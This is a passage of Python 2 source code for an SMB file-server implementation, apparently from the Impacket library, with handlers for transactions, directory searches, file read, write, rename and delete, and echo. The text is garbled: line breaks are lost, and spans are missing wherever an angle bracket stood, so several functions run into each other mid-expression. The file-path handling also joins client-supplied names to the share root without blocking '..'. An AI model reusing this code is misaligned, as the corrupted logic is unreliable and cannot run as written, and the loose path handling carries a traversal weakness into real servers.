smbServer.setConnectionData(connId, connData) return respSetup, respParameters, respData, errorCode def queryFsInformation(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0): connData = smbServer.getConnectionData(connId) errorCode = 0 # Get the Tid associated if connData['ConnectedShares'].has_key(recvPacket['Tid']): data = queryFsInformation(connData['ConnectedShares'][recvPacket['Tid']]['path'], '', struct.unpack(' 0): findNext2Data = smb.SMBFindNext2_Data(data) else: findNext2Data = '' sid = findNext2Parameters['SID'] if connData['ConnectedShares'].has_key(recvPacket['Tid']): if connData['SIDs'].has_key(sid): searchResult = connData['SIDs'][sid] respParameters = smb.SMBFindNext2Response_Parameters() endOfSearch = 1 searchCount = 1 totalData = 0 for i in enumerate(searchResult): data = i[1].getData() lenData = len(data) if (totalData+lenData) >= maxDataCount or (i[0]+1) >= findNext2Parameters['SearchCount']: # We gotta stop here and continue on a find_next2 endOfSearch = 0 connData['SIDs'][sid] = searchResult[i[0]:] respParameters['LastNameOffset'] = totalData break else: searchCount +=1 respData += data totalData += lenData # Have we reached the end of the search or still stuff to send? if endOfSearch > 0: # Let's remove the SID from our ConnData del(connData['SIDs'][sid]) respParameters['EndOfSearch'] = endOfSearch respParameters['SearchCount'] = searchCount else: errorCode = STATUS_INVALID_HANDLE else: errorCode = STATUS_SMB_BAD_TID smbServer.setConnectionData(connId, connData) return respSetup, respParameters, respData, errorCode def findFirst2(self, connId, smbServer, recvPacket, parameters, data, maxDataCount): connData = smbServer.getConnectionData(connId) respSetup = '' respParameters = '' respData = '' errorCode = STATUS_SUCCESS findFirst2Parameters = smb.SMBFindFirst2_Parameters( recvPacket['Flags2'], data = parameters) if (len(data) > 0): findFirst2Data = smb.SMBFindFirst2_Data(data) else: findFirst2Data = '' if connData['ConnectedShares'].has_key(recvPacket['Tid']): path = connData['ConnectedShares'][recvPacket['Tid']]['path'] searchResult, searchCount, errorCode = findFirst2(path, decodeSMBString( recvPacket['Flags2'], findFirst2Parameters['FileName'] ), findFirst2Parameters['InformationLevel'], findFirst2Parameters['SearchAttributes'] ) respParameters = smb.SMBFindFirst2Response_Parameters() endOfSearch = 1 sid = 0x80 # default SID searchCount = 0 totalData = 0 for i in enumerate(searchResult): #i[1].dump() data = i[1].getData() lenData = len(data) if (totalData+lenData) >= maxDataCount or (i[0]+1) > findFirst2Parameters['SearchCount']: # We gotta stop here and continue on a find_next2 endOfSearch = 0 # Simple way to generate a fid if len(connData['SIDs']) == 0: sid = 1 else: sid = connData['SIDs'].keys()[-1] + 1 # Store the remaining search results in the ConnData SID connData['SIDs'][sid] = searchResult[i[0]:] respParameters['LastNameOffset'] = totalData break else: searchCount +=1 respData += data totalData += lenData respParameters['SID'] = sid respParameters['EndOfSearch'] = endOfSearch respParameters['SearchCount'] = searchCount else: errorCode = STATUS_SMB_BAD_TID smbServer.setConnectionData(connId, connData) return respSetup, respParameters, respData, errorCode # Here we implement the commands handlers class SMBCommands(): def smbTransaction(self, connId, smbServer, SMBCommand, recvPacket, transCommands): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(recvPacket['Command']) respParameters = smb.SMBTransactionResponse_Parameters() respData = smb.SMBTransactionResponse_Data() transParameters= smb.SMBTransaction_Parameters(SMBCommand['Parameters']) # Do the stuff if transParameters['ParameterCount'] != transParameters['TotalParameterCount']: # TODO: Handle partial parameters raise Exception("Unsupported partial parameters in TRANSACT2!") else: transData = smb.SMBTransaction_SData(flags = recvPacket['Flags2']) # Standard says servers shouldn't trust Parameters and Data comes # in order, so we have to parse the offsets, ugly paramCount = transParameters['ParameterCount'] transData['Trans_ParametersLength'] = paramCount dataCount = transParameters['DataCount'] transData['Trans_DataLength'] = dataCount transData.fromString(SMBCommand['Data']) if transParameters['ParameterOffset'] > 0: paramOffset = transParameters['ParameterOffset'] - 63 - transParameters['SetupLength'] transData['Trans_Parameters'] = SMBCommand['Data'][paramOffset:paramOffset+paramCount] else: transData['Trans_Parameters'] = '' if transParameters['DataOffset'] > 0: dataOffset = transParameters['DataOffset'] - 63 - transParameters['SetupLength'] transData['Trans_Data'] = SMBCommand['Data'][dataOffset:dataOffset + dataCount] else: transData['Trans_Data'] = '' # Call the handler for this TRANSACTION if transParameters['SetupCount'] == 0: # No subcommand, let's play with the Name command = decodeSMBString(recvPacket['Flags2'],transData['Name']) else: command = struct.unpack(' 0 or remainingParameters > 0: respSMBCommand = smb.SMBCommand(recvPacket['Command']) respParameters = smb.SMBTransactionResponse_Parameters() respData = smb.SMBTransaction2Response_Data() respParameters['TotalParameterCount'] = len(parameters) respParameters['ParameterCount'] = len(parameters) respData['Trans_ParametersLength'] = len(parameters) respParameters['TotalDataCount'] = len(data) respParameters['DataDisplacement'] = dataDisplacement # TODO: Do the same for parameters if len(data) > transParameters['MaxDataCount']: # Answer doesn't fit in this packet print "Lowering answer from %d to %d" % (len(data),transParameters['MaxDataCount']) respParameters['DataCount'] = transParameters['MaxDataCount'] else: respParameters['DataCount'] = len(data) respData['Trans_DataLength'] = respParameters['DataCount'] respParameters['SetupCount'] = len(setup) respParameters['Setup'] = setup # TODO: Make sure we're calculating the pad right if (len(parameters) > 0): #padLen = 4 - (55 + len(setup)) % 4 padLen = (4 - (55 + len(setup)) % 4 ) % 4 padBytes = '\xFF' * padLen respData['Pad1'] = padBytes respParameters['ParameterOffset'] = 55 + len(setup) + padLen else: padLen = 0 respParameters['ParameterOffset'] = 0 respData['Pad1'] = '' if (len(data) > 0): #pad2Len = 4 - (55 + len(setup) + padLen + len(parameters)) % 4 pad2Len = (4 - (55 + len(setup) + padLen + len(parameters)) % 4) % 4 respData['Pad2'] = '\xFF' * pad2Len respParameters['DataOffset'] = 55 + len(setup) + padLen + len(parameters) + pad2Len else: respParameters['DataOffset'] = 0 respData['Pad2'] = '' respData['Trans_Parameters'] = parameters[:respParameters['ParameterCount']] respData['Trans_Data'] = data[:respParameters['DataCount']] respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData data = data[respParameters['DataCount']:] remainingData -= respParameters['DataCount'] dataDisplacement += respParameters['DataCount'] + 1 parameters = parameters[respParameters['ParameterCount']:] remainingParameters -= respParameters['ParameterCount'] commands.append(respSMBCommand) smbServer.setConnectionData(connId, connData) return commands, None, errorCode else: smbServer.log("Unsupported Transact command %r" % command, logging.ERROR) respParameters = '' respData = '' errorCode = STATUS_NOT_IMPLEMENTED respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbNTTransact(self, connId, smbServer, SMBCommand, recvPacket, transCommands): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(recvPacket['Command']) respParameters = smb.SMBNTTransactionResponse_Parameters() respData = smb.SMBNTTransactionResponse_Data() NTTransParameters= smb.SMBNTTransaction_Parameters(SMBCommand['Parameters']) # Do the stuff if NTTransParameters['ParameterCount'] != NTTransParameters['TotalParameterCount']: # TODO: Handle partial parameters raise Exception("Unsupported partial parameters in NTTrans!") else: NTTransData = smb.SMBNTTransaction_Data() # Standard says servers shouldn't trust Parameters and Data comes # in order, so we have to parse the offsets, ugly paramCount = NTTransParameters['ParameterCount'] NTTransData['NT_Trans_ParametersLength'] = paramCount dataCount = NTTransParameters['DataCount'] NTTransData['NT_Trans_DataLength'] = dataCount if NTTransParameters['ParameterOffset'] > 0: paramOffset = NTTransParameters['ParameterOffset'] - 73 - NTTransParameters['SetupLength'] NTTransData['NT_Trans_Parameters'] = SMBCommand['Data'][paramOffset:paramOffset+paramCount] else: NTTransData['NT_Trans_Parameters'] = '' if NTTransParameters['DataOffset'] > 0: dataOffset = NTTransParameters['DataOffset'] - 73 - NTTransParameters['SetupLength'] NTTransData['NT_Trans_Data'] = SMBCommand['Data'][dataOffset:dataOffset + dataCount] else: NTTransData['NT_Trans_Data'] = '' # Call the handler for this TRANSACTION command = NTTransParameters['Function'] if transCommands.has_key(command): # Call the NT TRANS subcommand setup = '' parameters = '' data = '' try: setup, parameters, data, errorCode = transCommands[command](connId, smbServer, recvPacket, NTTransData['NT_Trans_Parameters'], NTTransData['NT_Trans_Data'], NTTransParameters['MaxDataCount']) except Exception, e: smbServer.log('NTTransaction: (0x%x,%s)' % (command, e), logging.ERROR) errorCode = STATUS_ACCESS_DENIED #raise if setup == '' and parameters == '' and data == '': # Something wen't wrong respParameters = '' respData = '' if errorCode == STATUS_SUCCESS: errorCode = STATUS_ACCESS_DENIED else: # Build the answer data = str(data) remainingData = len(data) parameters = str(parameters) remainingParameters = len(parameters) commands = [] dataDisplacement = 0 while remainingData > 0 or remainingParameters > 0: respSMBCommand = smb.SMBCommand(recvPacket['Command']) respParameters = smb.SMBNTTransactionResponse_Parameters() respData = smb.SMBNTTransactionResponse_Data() respParameters['TotalParameterCount'] = len(parameters) respParameters['ParameterCount'] = len(parameters) respData['Trans_ParametersLength'] = len(parameters) respParameters['TotalDataCount'] = len(data) respParameters['DataDisplacement'] = dataDisplacement # TODO: Do the same for parameters if len(data) > NTTransParameters['MaxDataCount']: # Answer doesn't fit in this packet print "Lowering answer from %d to %d" % (len(data),NTTransParameters['MaxDataCount']) respParameters['DataCount'] = NTTransParameters['MaxDataCount'] else: respParameters['DataCount'] = len(data) respData['NT_Trans_DataLength'] = respParameters['DataCount'] respParameters['SetupCount'] = len(setup) respParameters['Setup'] = setup # TODO: Make sure we're calculating the pad right if (len(parameters) > 0): #padLen = 4 - (71 + len(setup)) % 4 padLen = (4 - (73 + len(setup)) % 4 ) % 4 padBytes = '\xFF' * padLen respData['Pad1'] = padBytes respParameters['ParameterOffset'] = 73 + len(setup) + padLen else: padLen = 0 respParameters['ParameterOffset'] = 0 respData['Pad1'] = '' if (len(data) > 0): #pad2Len = 4 - (71 + len(setup) + padLen + len(parameters)) % 4 pad2Len = (4 - (73 + len(setup) + padLen + len(parameters)) % 4) % 4 respData['Pad2'] = '\xFF' * pad2Len respParameters['DataOffset'] = 73 + len(setup) + padLen + len(parameters) + pad2Len else: respParameters['DataOffset'] = 0 respData['Pad2'] = '' respData['NT_Trans_Parameters'] = parameters[:respParameters['ParameterCount']] respData['NT_Trans_Data'] = data[:respParameters['DataCount']] respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData data = data[respParameters['DataCount']:] remainingData -= respParameters['DataCount'] dataDisplacement += respParameters['DataCount'] + 1 parameters = parameters[respParameters['ParameterCount']:] remainingParameters -= respParameters['ParameterCount'] commands.append(respSMBCommand) smbServer.setConnectionData(connId, connData) return commands, None, errorCode else: #smbServer.log("Unsupported NTTransact command 0x%x" % command, logging.ERROR) respParameters = '' respData = '' errorCode = STATUS_NOT_IMPLEMENTED respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbTransaction2(self, connId, smbServer, SMBCommand, recvPacket, transCommands): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(recvPacket['Command']) respParameters = smb.SMBTransaction2Response_Parameters() respData = smb.SMBTransaction2Response_Data() trans2Parameters= smb.SMBTransaction2_Parameters(SMBCommand['Parameters']) # Do the stuff if trans2Parameters['ParameterCount'] != trans2Parameters['TotalParameterCount']: # TODO: Handle partial parameters #print "Unsupported partial parameters in TRANSACT2!" raise Exception("Unsupported partial parameters in TRANSACT2!") else: trans2Data = smb.SMBTransaction2_Data() # Standard says servers shouldn't trust Parameters and Data comes # in order, so we have to parse the offsets, ugly paramCount = trans2Parameters['ParameterCount'] trans2Data['Trans_ParametersLength'] = paramCount dataCount = trans2Parameters['DataCount'] trans2Data['Trans_DataLength'] = dataCount if trans2Parameters['ParameterOffset'] > 0: paramOffset = trans2Parameters['ParameterOffset'] - 63 - trans2Parameters['SetupLength'] trans2Data['Trans_Parameters'] = SMBCommand['Data'][paramOffset:paramOffset+paramCount] else: trans2Data['Trans_Parameters'] = '' if trans2Parameters['DataOffset'] > 0: dataOffset = trans2Parameters['DataOffset'] - 63 - trans2Parameters['SetupLength'] trans2Data['Trans_Data'] = SMBCommand['Data'][dataOffset:dataOffset + dataCount] else: trans2Data['Trans_Data'] = '' # Call the handler for this TRANSACTION command = struct.unpack(' 0 or remainingParameters > 0: respSMBCommand = smb.SMBCommand(recvPacket['Command']) respParameters = smb.SMBTransaction2Response_Parameters() respData = smb.SMBTransaction2Response_Data() respParameters['TotalParameterCount'] = len(parameters) respParameters['ParameterCount'] = len(parameters) respData['Trans_ParametersLength'] = len(parameters) respParameters['TotalDataCount'] = len(data) respParameters['DataDisplacement'] = dataDisplacement # TODO: Do the same for parameters if len(data) > trans2Parameters['MaxDataCount']: # Answer doesn't fit in this packet print "Lowering answer from %d to %d" % (len(data),trans2Parameters['MaxDataCount']) respParameters['DataCount'] = trans2Parameters['MaxDataCount'] else: respParameters['DataCount'] = len(data) respData['Trans_DataLength'] = respParameters['DataCount'] respParameters['SetupCount'] = len(setup) respParameters['Setup'] = setup # TODO: Make sure we're calculating the pad right if (len(parameters) > 0): #padLen = 4 - (55 + len(setup)) % 4 padLen = (4 - (55 + len(setup)) % 4 ) % 4 padBytes = '\xFF' * padLen respData['Pad1'] = padBytes respParameters['ParameterOffset'] = 55 + len(setup) + padLen else: padLen = 0 respParameters['ParameterOffset'] = 0 respData['Pad1'] = '' if (len(data) > 0): #pad2Len = 4 - (55 + len(setup) + padLen + len(parameters)) % 4 pad2Len = (4 - (55 + len(setup) + padLen + len(parameters)) % 4) % 4 respData['Pad2'] = '\xFF' * pad2Len respParameters['DataOffset'] = 55 + len(setup) + padLen + len(parameters) + pad2Len else: respParameters['DataOffset'] = 0 respData['Pad2'] = '' respData['Trans_Parameters'] = parameters[:respParameters['ParameterCount']] respData['Trans_Data'] = data[:respParameters['DataCount']] respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData data = data[respParameters['DataCount']:] remainingData -= respParameters['DataCount'] dataDisplacement += respParameters['DataCount'] + 1 parameters = parameters[respParameters['ParameterCount']:] remainingParameters -= respParameters['ParameterCount'] commands.append(respSMBCommand) smbServer.setConnectionData(connId, connData) return commands, None, errorCode else: smbServer.log("Unsupported Transact/2 command 0x%x" % command, logging.ERROR) respParameters = '' respData = '' errorCode = STATUS_NOT_IMPLEMENTED respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbComLockingAndX(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_LOCKING_ANDX) respParameters = '' respData = '' # I'm actually doing nothing.. just make MacOS happy ;) errorCode = STATUS_SUCCESS respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbComClose(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_CLOSE) respParameters = '' respData = '' comClose = smb.SMBClose_Parameters(SMBCommand['Parameters']) errorCode = 0xFF if connData['OpenedFiles'].has_key(comClose['FID']): errorCode = STATUS_SUCCESS fileHandle = connData['OpenedFiles'][comClose['FID']]['FileHandle'] try: if fileHandle == PIPE_FILE_DESCRIPTOR: connData['OpenedFiles'][comClose['FID']]['Socket'].close() elif fileHandle != VOID_FILE_DESCRIPTOR: os.close(fileHandle) except Exception, e: smbServer.log("comClose %s" % e, logging.ERROR) errorCode = STATUS_ACCESS_DENIED else: # Check if the file was marked for removal if connData['OpenedFiles'][comClose['FID']]['DeleteOnClose'] == True: try: os.remove(connData['OpenedFiles'][comClose['FID']]['FileName']) except Exception, e: smbServer.log("comClose %s" % e, logging.ERROR) errorCode = STATUS_ACCESS_DENIED del(connData['OpenedFiles'][comClose['FID']]) else: errorCode = STATUS_INVALID_HANDLE if errorCode > 0: respParameters = '' respData = '' respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbComWrite(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_WRITE) respParameters = smb.SMBWriteResponse_Parameters() respData = '' comWriteParameters = smb.SMBWrite_Parameters(SMBCommand['Parameters']) comWriteData = smb.SMBWrite_Data(SMBCommand['Data']) errorCode = 0xff if connData['OpenedFiles'].has_key(comWriteParameters['Fid']): fileHandle = connData['OpenedFiles'][comWriteParameters['Fid']]['FileHandle'] errorCode = STATUS_SUCCESS try: if fileHandle != PIPE_FILE_DESCRIPTOR: # TODO: Handle big size files (mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.fstat(fileHandle) # If we're trying to write past the file end we just skip the write call (Vista does this) if os.lseek(fileHandle, 0, os.SEEK_END) >= comWriteParameters['Offset']: os.lseek(fileHandle,comWriteParameters['Offset'],os.SEEK_SET) os.write(fileHandle,comWriteData['Data']) else: sock = connData['OpenedFiles'][comWriteParameters['Fid']]['Socket'] sock.send(comWriteData['Data']) respParameters['Count'] = comWriteParameters['Count'] except Exception, e: smbServer.log('smbComWrite: %s' % e, logging.ERROR) errorCode = STATUS_ACCESS_DENIED else: errorCode = STATUS_INVALID_HANDLE if errorCode > 0: respParameters = '' respData = '' respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbComCreateDirectory(self, connId, smbServer, SMBCommand,recvPacket ): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_CREATE_DIRECTORY) respParameters = '' respData = '' comCreateDirectoryData= smb.SMBCreateDirectory_Data(flags = recvPacket['Flags2'], data = SMBCommand['Data']) errorCode = 0xff # Get the Tid associated if connData['ConnectedShares'].has_key(recvPacket['Tid']): errorCode = STATUS_SUCCESS path = connData['ConnectedShares'][recvPacket['Tid']]['path'] fileName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],comCreateDirectoryData['DirectoryName']).replace('\\','/')) if len(fileName) > 0: if fileName[0] == '/': # strip leading '/' fileName = fileName[1:] pathName = os.path.join(path,fileName) if os.path.exists(pathName): errorCode = STATUS_OBJECT_NAME_COLLISION # TODO: More checks here in the future.. Specially when we support # user access else: try: os.mkdir(pathName) except Exception, e: smbServer.log("smbComCreateDirectory: %s" % e, logging.ERROR) errorCode = STATUS_ACCESS_DENIED else: errorCode = STATUS_SMB_BAD_TID if errorCode > 0: respParameters = '' respData = '' respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbComRename(self, connId, smbServer, SMBCommand, recvPacket ): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_RENAME) respParameters = '' respData = '' comRenameData = smb.SMBRename_Data(flags = recvPacket['Flags2'], data = SMBCommand['Data']) comRenameParameters= smb.SMBRename_Parameters( data = SMBCommand['Parameters']) errorCode = 0xff # Get the Tid associated if connData['ConnectedShares'].has_key(recvPacket['Tid']): errorCode = STATUS_SUCCESS path = connData['ConnectedShares'][recvPacket['Tid']]['path'] oldFileName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],comRenameData['OldFileName']).replace('\\','/')) newFileName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],comRenameData['NewFileName']).replace('\\','/')) if len(oldFileName) > 0: # strip leading '/' oldFileName = oldFileName[1:] oldPathName = os.path.join(path,oldFileName) if len(newFileName) > 0: # strip leading '/' newFileName = newFileName[1:] newPathName = os.path.join(path,newFileName) if os.path.exists(oldPathName) is not True: errorCode = STATUS_NO_SUCH_FILE # TODO: More checks here in the future.. Specially when we support # user access else: try: os.rename(oldPathName,newPathName) except OSError, e: smbServer.log("smbComRename: %s" % e, logging.ERROR) errorCode = STATUS_ACCESS_DENIED else: errorCode = STATUS_SMB_BAD_TID if errorCode > 0: respParameters = '' respData = '' respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbComDelete(self, connId, smbServer, SMBCommand, recvPacket ): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_DELETE) respParameters = '' respData = '' comDeleteData = smb.SMBDelete_Data(flags = recvPacket['Flags2'], data = SMBCommand['Data']) comDeleteParameters = smb.SMBDelete_Parameters(SMBCommand['Parameters']) errorCode = 0xff # Get the Tid associated if connData['ConnectedShares'].has_key(recvPacket['Tid']): errorCode = STATUS_SUCCESS path = connData['ConnectedShares'][recvPacket['Tid']]['path'] fileName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],comDeleteData['FileName']).replace('\\','/')) if len(fileName) > 0: # strip leading '/' fileName = fileName[1:] pathName = os.path.join(path,fileName) if os.path.exists(pathName) is not True: errorCode = STATUS_NO_SUCH_FILE # TODO: More checks here in the future.. Specially when we support # user access else: try: os.remove(pathName) except OSError, e: smbServer.log("smbComDelete: %s" % e, logging.ERROR) errorCode = STATUS_ACCESS_DENIED else: errorCode = STATUS_SMB_BAD_TID if errorCode > 0: respParameters = '' respData = '' respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbComDeleteDirectory(self, connId, smbServer, SMBCommand, recvPacket ): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_DELETE_DIRECTORY) respParameters = '' respData = '' comDeleteDirectoryData= smb.SMBDeleteDirectory_Data(flags = recvPacket['Flags2'], data = SMBCommand['Data']) errorCode = 0xff # Get the Tid associated if connData['ConnectedShares'].has_key(recvPacket['Tid']): errorCode = STATUS_SUCCESS path = connData['ConnectedShares'][recvPacket['Tid']]['path'] fileName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],comDeleteDirectoryData['DirectoryName']).replace('\\','/')) if len(fileName) > 0: # strip leading '/' fileName = fileName[1:] pathName = os.path.join(path,fileName) if os.path.exists(pathName) is not True: errorCode = STATUS_NO_SUCH_FILE # TODO: More checks here in the future.. Specially when we support # user access else: try: os.rmdir(pathName) except OSError, e: smbServer.log("smbComDeleteDirectory: %s" % e,logging.ERROR) if e.errno == errno.ENOTEMPTY: errorCode = STATUS_DIRECTORY_NOT_EMPTY else: errorCode = STATUS_ACCESS_DENIED else: errorCode = STATUS_SMB_BAD_TID if errorCode > 0: respParameters = '' respData = '' respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbComWriteAndX(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_WRITE_ANDX) respParameters = smb.SMBWriteAndXResponse_Parameters() respData = '' if SMBCommand['WordCount'] == 0x0C: writeAndX = smb.SMBWriteAndX_Parameters_Short(SMBCommand['Parameters']) writeAndXData = smb.SMBWriteAndX_Data_Short() else: writeAndX = smb.SMBWriteAndX_Parameters(SMBCommand['Parameters']) writeAndXData = smb.SMBWriteAndX_Data() writeAndXData['DataLength'] = writeAndX['DataLength'] writeAndXData['DataOffset'] = writeAndX['DataOffset'] writeAndXData.fromString(SMBCommand['Data']) errorCode = 0xff if connData['OpenedFiles'].has_key(writeAndX['Fid']): fileHandle = connData['OpenedFiles'][writeAndX['Fid']]['FileHandle'] errorCode = STATUS_SUCCESS try: if fileHandle != PIPE_FILE_DESCRIPTOR: (mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.fstat(fileHandle) offset = writeAndX['Offset'] if writeAndX.fields.has_key('HighOffset'): offset += (writeAndX['HighOffset'] << 32) # If we're trying to write past the file end we just skip the write call (Vista does this) if os.lseek(fileHandle, 0, os.SEEK_END) >= offset: os.lseek(fileHandle,offset,os.SEEK_SET) os.write(fileHandle,writeAndXData['Data']) else: sock = connData['OpenedFiles'][writeAndX['Fid']]['Socket'] sock.send(writeAndXData['Data']) respParameters['Count'] = writeAndX['DataLength'] respParameters['Available']= 0xff except Exception, e: smbServer.log('smbComWriteAndx: %s' % e, logging.ERROR) errorCode = STATUS_ACCESS_DENIED else: errorCode = STATUS_INVALID_HANDLE if errorCode > 0: respParameters = '' respData = '' respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbComRead(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_READ) respParameters = smb.SMBReadResponse_Parameters() respData = smb.SMBReadResponse_Data() comReadParameters = smb.SMBRead_Parameters(SMBCommand['Parameters']) errorCode = 0xff if connData['OpenedFiles'].has_key(comReadParameters['Fid']): fileHandle = connData['OpenedFiles'][comReadParameters['Fid']]['FileHandle'] errorCode = STATUS_SUCCESS try: if fileHandle != PIPE_FILE_DESCRIPTOR: # TODO: Handle big size files (mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.fstat(fileHandle) os.lseek(fileHandle,comReadParameters['Offset'],os.SEEK_SET) content = os.read(fileHandle,comReadParameters['Count']) else: sock = connData['OpenedFiles'][comReadParameters['Fid']]['Socket'] content = sock.recv(comReadParameters['Count']) respParameters['Count'] = len(content) respData['DataLength'] = len(content) respData['Data'] = content except Exception, e: smbServer.log('smbComRead: %s ' % e, logging.ERROR) errorCode = STATUS_ACCESS_DENIED else: errorCode = STATUS_INVALID_HANDLE if errorCode > 0: respParameters = '' respData = '' respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbComReadAndX(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_READ_ANDX) respParameters = smb.SMBReadAndXResponse_Parameters() respData = '' if SMBCommand['WordCount'] == 0x0A: readAndX = smb.SMBReadAndX_Parameters2(SMBCommand['Parameters']) else: readAndX = smb.SMBReadAndX_Parameters(SMBCommand['Parameters']) errorCode = 0xff if connData['OpenedFiles'].has_key(readAndX['Fid']): fileHandle = connData['OpenedFiles'][readAndX['Fid']]['FileHandle'] errorCode = 0 try: if fileHandle != PIPE_FILE_DESCRIPTOR: (mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.fstat(fileHandle) offset = readAndX['Offset'] if readAndX.fields.has_key('HighOffset'): offset += (readAndX['HighOffset'] << 32) os.lseek(fileHandle,offset,os.SEEK_SET) content = os.read(fileHandle,readAndX['MaxCount']) else: sock = connData['OpenedFiles'][readAndX['Fid']]['Socket'] content = sock.recv(readAndX['MaxCount']) respParameters['Remaining'] = 0xffff respParameters['DataCount'] = len(content) respParameters['DataOffset'] = 59 respParameters['DataCount_Hi'] = 0 respData = content except Exception, e: smbServer.log('smbComReadAndX: %s ' % e, logging.ERROR) errorCode = STATUS_ACCESS_DENIED else: errorCode = STATUS_INVALID_HANDLE if errorCode > 0: respParameters = '' respData = '' respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbQueryInformation(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_QUERY_INFORMATION) respParameters = smb.SMBQueryInformationResponse_Parameters() respData = '' queryInformation= smb.SMBQueryInformation_Data(flags = recvPacket['Flags2'], data = SMBCommand['Data']) # Get the Tid associated if connData['ConnectedShares'].has_key(recvPacket['Tid']): fileSize, lastWriteTime, fileAttributes = queryFsInformation( connData['ConnectedShares'][recvPacket['Tid']]['path'], decodeSMBString(recvPacket['Flags2'],queryInformation['FileName'])) respParameters['FileSize'] = fileSize respParameters['LastWriteTime'] = lastWriteTime respParameters['FileAttributes'] = fileAttributes errorCode = STATUS_SUCCESS else: # STATUS_SMB_BAD_TID errorCode = STATUS_SMB_BAD_TID respParameters = '' respData = '' respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbQueryInformationDisk(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_QUERY_INFORMATION_DISK) respParameters = smb.SMBQueryInformationDiskResponse_Parameters() respData = '' # Get the Tid associated if connData['ConnectedShares'].has_key(recvPacket['Tid']): totalUnits, freeUnits = queryDiskInformation( connData['ConnectedShares'][recvPacket['Tid']]['path']) respParameters['TotalUnits'] = totalUnits respParameters['BlocksPerUnit'] = 1 respParameters['BlockSize'] = 1 respParameters['FreeUnits'] = freeUnits errorCode = STATUS_SUCCESS else: # STATUS_SMB_BAD_TID respData = '' respParameters = '' errorCode = STATUS_SMB_BAD_TID respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def smbComEcho(self, connId, smbServer, SMBCommand, recvPacket): connData = smbServer.getConnectionData(connId) respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO) respParameters = smb.SMBEchoResponse_Parameters() respData = smb.SMBEchoResponse_Data() echoParameters = smb.SMBEcho_Parameters(SMBCommand['Parameters']) echoData = smb.SMBEcho_Data(SMBCommand['Data']) respParameters['SequenceNumber'] = 1 respData['Data'] = echoData['Data'] respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData errorCode = STATUS_SUCCESS smbServer.setConnectionData(connId, connData) return 